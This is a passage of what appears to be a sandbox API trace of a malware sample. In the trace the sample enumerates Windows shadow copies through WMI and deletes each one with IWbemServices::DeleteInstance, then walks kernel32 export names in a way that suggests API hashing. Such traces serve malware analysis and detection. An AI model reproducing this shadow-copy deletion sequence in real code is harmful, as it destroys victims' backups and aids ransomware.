wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0060.804] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0060.804] lstrlenW (lpString="{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}") returned 38 [0060.804] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0060.804] GetModuleHandleA (lpModuleName="user32.dll") returned 0x74f40000 [0060.805] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{AACD2EA4-29A9-4B07-A4A9-1320561DEC2F}'") returned 60 [0060.805] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0061.805] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.805] IUnknown:Release (This=0x31d1c0) returned 0x0 [0061.806] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0061.807] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{7199C78C-6563-4398-B813-4A3F86995AEC}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0061.807] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0061.807] lstrlenW (lpString="{7199C78C-6563-4398-B813-4A3F86995AEC}") returned 38 [0061.807] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0061.808] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{7199C78C-6563-4398-B813-4A3F86995AEC}'") returned 60 [0061.808] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0062.602] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0062.603] IUnknown:Release (This=0x31d1c0) returned 0x0 [0062.603] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0062.605] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{0F63D180-8A8A-41CF-8B3E-2852647AB192}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0062.605] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0062.605] lstrlenW (lpString="{0F63D180-8A8A-41CF-8B3E-2852647AB192}") returned 38 [0062.605] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0062.609] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{0F63D180-8A8A-41CF-8B3E-2852647AB192}'") returned 60 [0062.609] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0063.384] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0063.385] IUnknown:Release (This=0x31d1c0) returned 0x0 [0063.385] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0063.387] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0063.387] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0063.388] lstrlenW (lpString="{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}") returned 38 [0063.388] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0063.388] GetModuleHandleA (lpModuleName="user32.dll") returned 0x74f40000 [0063.388] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{0B0F76A6-8FD3-471C-82BB-6BFF00FEE5E6}'") returned 60 [0063.389] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0064.088] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.089] IUnknown:Release (This=0x31d1c0) returned 0x0 [0064.089] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0064.090] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0064.090] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0064.090] lstrlenW (lpString="{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}") returned 38 [0064.090] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0064.090] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{4F7A47EB-6D55-4A21-A8E3-D86C5E1F886F}'") returned 60 [0064.091] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0064.822] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0064.823] IUnknown:Release (This=0x31d1c0) returned 0x0 [0064.823] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0064.825] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0064.825] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0064.825] lstrlenW (lpString="{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}") returned 38 [0064.825] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0064.825] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{1AADC94C-D98B-4E59-91DD-8E2EFE01CFB1}'") returned 60 [0064.826] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0065.583] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.583] IUnknown:Release (This=0x31d1c0) returned 0x0 [0065.583] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0065.585] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{1EE90775-4E53-4C29-811E-F4996057D94E}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0065.586] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0065.586] lstrlenW (lpString="{1EE90775-4E53-4C29-811E-F4996057D94E}") returned 38 [0065.586] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0065.586] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{1EE90775-4E53-4C29-811E-F4996057D94E}'") returned 60 [0065.586] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0066.316] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.316] IUnknown:Release (This=0x31d1c0) returned 0x0 [0066.316] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0066.318] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{DC780020-7243-4B55-80A9-4BA6EE67823B}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0066.318] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0066.318] lstrlenW (lpString="{DC780020-7243-4B55-80A9-4BA6EE67823B}") returned 38 [0066.318] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0066.322] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'") returned 60 [0066.322] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0067.009] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.010] IUnknown:Release (This=0x31d1c0) returned 0x0 [0067.010] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0067.011] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{3DBBFF70-A67F-4333-8498-31E7BC089E0F}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0067.011] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0067.011] lstrlenW (lpString="{3DBBFF70-A67F-4333-8498-31E7BC089E0F}") returned 38 [0067.011] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0067.012] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'") returned 60 [0067.012] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0067.753] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0067.754] IUnknown:Release (This=0x31d1c0) returned 0x0 [0067.754] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0067.756] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{1924CB9A-2919-4442-A6C0-E60362A636CF}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0067.756] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0067.756] lstrlenW (lpString="{1924CB9A-2919-4442-A6C0-E60362A636CF}") returned 38 [0067.756] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0067.756] GetModuleHandleA (lpModuleName="user32.dll") returned 0x74f40000 [0067.757] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{1924CB9A-2919-4442-A6C0-E60362A636CF}'") returned 60 [0067.757] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0068.380] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.380] IUnknown:Release (This=0x31d1c0) returned 0x0 [0068.380] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0068.382] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{5555A914-627B-4AF5-A342-EC1A6421363A}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0068.382] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0068.382] lstrlenW (lpString="{5555A914-627B-4AF5-A342-EC1A6421363A}") returned 38 [0068.382] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0068.382] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'") returned 60 [0068.382] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0068.991] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0068.991] IUnknown:Release (This=0x31d1c0) returned 0x0 [0068.991] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0068.993] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{C7241040-5C13-409D-A239-55D005C03DE9}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0068.993] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0068.993] lstrlenW (lpString="{C7241040-5C13-409D-A239-55D005C03DE9}") returned 38 [0068.993] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0068.993] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{C7241040-5C13-409D-A239-55D005C03DE9}'") returned 60 [0068.993] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0069.649] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.649] IUnknown:Release (This=0x31d1c0) returned 0x0 [0069.649] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0069.651] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0069.651] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0069.651] lstrlenW (lpString="{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}") returned 38 [0069.651] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0069.652] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{E3DFFA61-E1CC-49E0-BCD2-5A0175DAACD9}'") returned 60 [0069.652] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0070.297] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.297] IUnknown:Release (This=0x31d1c0) returned 0x0 [0070.297] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0070.299] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61eabc, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0070.299] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0070.299] lstrlenW (lpString="{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}") returned 38 [0070.299] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0070.299] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{A15F4F35-0EBE-4C4B-97F3-D2181096B62F}'") returned 60 [0070.299] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0070.959] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0070.960] IUnknown:Release (This=0x31d1c0) returned 0x0 [0070.960] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x1) returned 0x0 [0070.962] IWbemClassObject:Get (in: This=0x31d1c0, wszName="id", lFlags=0, pVal=0xc9f1a8*(varType=0x0, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1=0x61ea34, varVal2=0x5d7480), pType=0x0, plFlavor=0x0 | out: pVal=0xc9f1a8*(varType=0x8, wReserved1=0x5d, wReserved2=0x70d8, wReserved3=0x5d, varVal1="{E369493E-E5B4-449B-8539-770BCA375ABB}", varVal2=0x5d7480), pType=0x0, plFlavor=0x0) returned 0x0 [0070.962] lstrlenW (lpString="Win32_ShadowCopy.id='%s'") returned 24 [0070.962] lstrlenW (lpString="{E369493E-E5B4-449B-8539-770BCA375ABB}") returned 38 [0070.962] VirtualAlloc (lpAddress=0x0, dwSize=0x94, flAllocationType=0x3000, flProtect=0x4) returned 0xf10000 [0070.963] wsprintfW (in: param_1=0xf10000, param_2="Win32_ShadowCopy.ID='%s'" | out: param_1="Win32_ShadowCopy.ID='{E369493E-E5B4-449B-8539-770BCA375ABB}'") returned 60 [0070.963] IWbemServices:DeleteInstance (in: This=0x31d0e4, strObjectPath=0xf10000, lFlags=0, pCtx=0x31cff8, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0071.031] VirtualFree (lpAddress=0xf10000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.032] IUnknown:Release (This=0x31d1c0) returned 0x0 [0071.032] IEnumWbemClassObject:Next (in: This=0x31d184, lTimeout=-1, uCount=0x1, apObjects=0xc9f19c, puReturned=0xc9f18c | out: apObjects=0xc9f19c*=0x31d1c0, puReturned=0xc9f18c*=0x0) returned 0x1 [0071.036] WbemLocator:IUnknown:Release (This=0x31d0e4) returned 0x0 [0071.037] WbemLocator:IUnknown:Release (This=0x310880) returned 0x0 [0071.037] WbemContext:IUnknown:Release (This=0x31cff8) returned 0x0 [0071.037] CoUninitialize () [0071.044] lstrlenA (lpString="kernel32.dll") returned 12 [0071.044] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0071.044] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0071.044] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0071.044] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0071.044] lstrlenA (lpString="ADDATOMA") returned 8 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0071.044] lstrlenA (lpString="ADDATOMW") returned 8 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0071.044] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0071.044] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0071.044] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0071.044] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0071.044] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0071.045] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0071.045] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0071.045] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0071.045] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0071.045] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0071.045] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0071.045] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0071.045] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0071.045] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0071.045] lstrcpyA (in: lpString1=0xc9e9dc, 